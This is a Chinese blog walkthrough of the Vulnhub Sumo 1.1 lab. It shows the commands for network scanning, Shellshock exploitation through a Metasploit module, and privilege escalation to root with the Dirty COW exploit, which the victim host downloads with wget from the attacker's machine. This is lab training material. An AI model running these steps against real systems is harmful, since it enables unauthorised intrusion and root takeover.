[网络安全学习篇78]:Sumo: 1.1 Vulnhub 实战(脏牛漏洞提权)

往期博文:

[网络安全学习篇69]:渗透测试实战-DC-1-靶机入侵

[网络安全学习篇70]:渗透测试实战-DC-2-靶机入侵

[网络安全学习篇71]:渗透测试实战-DC-3-靶机入侵

[网络安全学习篇72]:渗透测试实战-DC-4-靶机入侵

[网络安全学习篇73]:渗透测试实战-DC-5-靶机入侵

[网络安全学习篇74]:渗透测试实战-DC-6-靶机入侵

[网络安全学习篇75]:渗透测试实战-DC-7-靶机入侵

[网络安全学习篇76]:渗透测试实战-DC-8-靶机入侵

[网络安全学习篇77]:渗透测试实战-DC-9-靶机入侵

[网络安全学习篇78]:Sumo: 1.1 Vulnhub 实战(脏牛漏洞提权)(本篇)

下期博文:

[网络安全学习篇79]:Geisha: 1 Vulnhub 实战

目录

网络扫描

攻击

脏牛-提权

拿到flag


网络扫描

arp-scan -l

nmap -A 192.168.1.174 -p-

nikto 扫描网站漏洞

nikto -h http://192.168.1.174

攻击

使用msf 查找此漏洞的攻击模块

 

use exploit/multi/http/apache_mod_cgi_bash_env_exec

set RHOSTS 192.168.1.174

set TARGETURI /cgi-bin/test

exploit

脏牛-提权

扫描是否存在脏牛漏洞脚本scan-dirtycow.sh

https://github.com/aishee/scan-dirtycow/blob/master/dirtycowscan.sh

exp:dirty.c

https://www.exploit-db.com/raw/40839

kali 本地开启http 服务

python -m SimpleHTTPServer

远程访问kali 并下载脚本文件,扫描,发现存在脏牛漏洞

wget http://192.168.1.164:8000/scan-dirtycow.sh

chmod 777 scan-dirtycow.sh

./scan-dirtycow.sh

漏洞利用

远程下载exp,编译

wget http://192.168.1.164:8000/dirty.c

chmod 777 dirty.c

gcc -pthread dirty.c -o dirty -lcrypt

拿到flag

./dirty testpasswd

su firefart

testpasswd

参考博文:

https://cyb3rbl0g.github.io/sumo-vulnhub-walkthrough/

https://www.vulnhub.com/

猜你喜欢

转载自blog.csdn.net/weixin_43252204/article/details/106414590
今日推荐